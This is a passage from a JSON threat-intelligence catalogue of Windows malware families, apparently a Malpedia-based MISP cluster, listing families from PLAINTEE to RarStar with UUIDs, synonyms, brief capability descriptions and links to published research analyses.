"description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", "value": "PLAINTEE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" ], "synonyms": [], "type": [] }, "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", "value": "playwork" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", "http://www.freebuf.com/column/159865.html", "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf" ], "synonyms": [ "TSCookie" ], "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", "value": "PLEAD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", "value": "Plexor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" ], "synonyms": [], "type": [] }, "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", "value": "Ploutus ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" ], "synonyms": [], "type": [] }, "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", "value": "ployx" }, { "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "https://community.rsa.com/thread/185439", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" ], "synonyms": [ "Korplug" ], "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", "value": "PlugX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" ], "synonyms": [], "type": [] }, "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", "value": "pngdowner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "http://blogs.360.cn/post/APT_C_01_en.html", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "pivy", "poisonivy" ], "type": [] }, "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", "value": "Poison Ivy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" ], "synonyms": [], "type": [] }, "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", "value": "Polyglot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://github.com/nyx0/Pony" ], "synonyms": [ "Fareit", "Siplog" ], "type": [] }, "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", "value": "Pony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", "value": "PoohMilk Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", "https://twitter.com/malwrhunterteam/status/806595092177965058" ], "synonyms": [], "type": [] }, "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", "value": "Popcorn Time" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" ], "synonyms": [], "type": [] }, "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", "value": "portless" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" ], "synonyms": [], "type": [] }, "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" ], "synonyms": [], "type": [] }, "uuid": "0215eae2-0ab7-4567-8ac6-1be36a7893a6", "value": "PoshC2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" ], "synonyms": [], "type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", "value": "Poweliks Dropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ], "synonyms": [], "type": [] }, "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], "type": [] }, "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475", "value": "powerkatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", "value": "PowerPool" }, { "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", "https://lokalhost.pl/gozi_tree.txt", "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/", "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/" ], "synonyms": [], "type": [] }, "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", "value": "Powersniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "606f778a-8b99-4880-8da8-b923651d627b", "value": "PowerRatankba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" ], "synonyms": [], "type": [] }, "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", "value": "prb_backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", "https://securelist.com/a-predatory-tale/89779", "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" ], "synonyms": [], "type": [] }, "uuid": "54041c03-5714-4247-9226-3c801f59bc07", "value": "Predator The Thief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" ], "synonyms": [], "type": [] }, "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", "value": "Prikorma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502", "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", "value": "Prilex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/", "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", "value": "PrincessLocker" }, { "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], "type": [] }, "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", "value": "PsiX" }, { "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" ], "synonyms": [ "PSS" ], "type": [] }, "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", "value": "PC Surveillance System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", "https://cert.gov.ua/news/42", "https://blog.threatstop.com/russian-apt-gamaredon-group", "https://cert.gov.ua/news/46" ], "synonyms": [], "type": [] }, "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", "value": "Pteranodon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", "http://blog.alyac.co.kr/1853", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", "value": "PubNubRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" ], "synonyms": [], "type": [] }, "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", "value": "Punkey POS" }, { "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://github.com/n1nj4sec/pupy", "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", "value": "pupy (Windows)" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/", "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", "https://www.secureworks.com/research/pushdo", "http://malware-traffic-analysis.net/2017/04/03/index2.html" ], "synonyms": [], "type": [] }, "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", "value": "Pushdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" ], "synonyms": [], "type": [] }, "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", "value": "Putabmow" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", "value": "PvzOut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", "https://twitter.com/physicaldrive0/status/573109512145649664", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html" ], "synonyms": [], "type": [] }, "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", "value": "pwnpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", "https://www.youtube.com/watch?v=HfSQlC76_s4" ], "synonyms": [], "type": [] }, "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", "value": "Pykspa" }, { "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ "Locky Locker" ], "type": [] }, "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", "value": "PyLocky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" ], "synonyms": [], "type": [] }, "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", "value": "Qaccel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf", "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" ], "synonyms": [], "type": [] }, "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", "value": "Qadars" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://contagiodump.blogspot.com/2010/11/template.html", "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" ], "synonyms": [ "Pinkslipbot", "Qbot" ], "type": [] }, "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", "value": "QakBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" ], "synonyms": [ "Tolouge" ], "type": [] }, "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", "value": "QHost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" ], "synonyms": [ "qtproject" ], "type": [] }, "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", "value": "QtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" ], "synonyms": [], "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", "value": "Quant Loader" }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/quasar/QuasarRAT/tree/master/Client", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://twitter.com/malwrhunterteam/status/789153556255342596", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": "Quasar RAT" }, { "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab", "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/" ], "synonyms": [], "type": [] }, "uuid": "728ce877-6f1d-4719-81df-387a8e395695", "value": "Qulab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" ], "synonyms": [], "type": [] }, "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", "value": "r980" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" ], "synonyms": [], "type": [] }, "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", "value": "Radamant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" ], "synonyms": [], "type": [] }, "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", "value": "RadRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni", "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/" ], "synonyms": [], "type": [] }, "uuid": "cf6887d9-3d68-4f89-9d61-e97dcc4d8c20", "value": "Rakhni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html" ], "synonyms": [ "brebsd" ], "type": [] }, "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", "value": "Rambo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" ], "synonyms": [], "type": [] }, "uuid": "51f53823-d289-4176-af45-3fca7eda824b", "value": "Ramdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", "https://research.checkpoint.com/ramnits-network-proxy-servers/", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" ], "synonyms": [ "Nimnul" ], "type": [] }, "uuid": "542161c0-47a4-4297-baca-5ed98386d228", "value": "Ramnit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" ], "synonyms": [], "type": [] }, "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", "value": "Ranbyus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", "http://blog.talosintel.com/2016/07/ranscam.html" ], "synonyms": [], "type": [] }, "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", "value": "Ranscam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" ], "synonyms": [], "type": [] }, "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", "value": "Ransoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", "https://forum.malekal.com/viewtopic.php?t=36485&start=", "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" ], "synonyms": [ "WinLock" ], "type": [] }, "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", "value": "Ransomlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/997748495888076800", "https://twitter.com/malwrhunterteam/status/977275481765613569" ], "synonyms": [], "type": [] }, "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", "value": "Rapid Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" ], "synonyms": [], "type": [] }, "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", "value": "RapidStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog", "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/", "https://tracker.fumik0.com/malware/Rarog" ], "synonyms": [], "type": [] }, "uuid": "184e5134-473c-4a01-9a8b-f4776f178fc9", "value": "Rarog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [], "type": [] }, "uuid": 